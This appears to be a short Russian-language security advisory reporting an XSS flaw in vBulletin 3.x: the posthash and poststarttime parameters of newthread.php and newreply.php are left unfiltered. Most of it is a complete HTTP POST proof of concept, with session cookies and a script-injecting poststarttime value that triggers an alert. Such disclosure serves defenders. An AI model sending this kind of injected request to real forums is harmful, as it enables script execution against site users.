XSS в vBulletin 3.x

Здравствуйте, vuln.

Параметры posthash и poststarttime в скриптах newreply.php и
newthread.php не фильтруются в POST-запросе (это для версии 3.0.9 для
3.5.4 уязвим только параметр posthash и только в скрипте newthread.php)

В результате чего возможна атака типа XSS.

                     ПРИМЕР:

POST /forum/newthread.php HTTP/1.0
Cookie: bbpda=1;
bbthread_rate=1c6bfc06f109abf5078b2045c33e55a4ax1x-ix1yix5y_;
bbcalview1=displaymonth; bbcalmonth=4; bbcalyear=2006;
bbthread_lastview=394ad39f3930b09d1831a211b105b2d6ax1x-ix1ysx10x%221133126055%22y_;
bbforum_view=888e1d7caeee8543b71b0312be1553edax2x-ix1yix1144526895yix3yix1144526913y_;
bbpassword=a7aaf4a00945981be9f73671700f4027; bblastvisit=1144526894;
bbsessionhash=ba9575585221066d61a0c88baa3fba4c; bbuserid=1
Content-Length: 348
Accept: /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: www.vulnerable.ru
Content-Type: application/x-www-form-urlencoded
Referer: http://www.vulnerable.ru/forum/newthread.php?do=newthread&f=3

subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8d3fe38b082b6d3381cbee17f1f1aca&
poststarttime='%2Balert('Shanker')%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2%E5%EC%F3&parseurl=1&
disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0

С уважением,
Агиевич Игорь aka Shanker mailto:[email protected]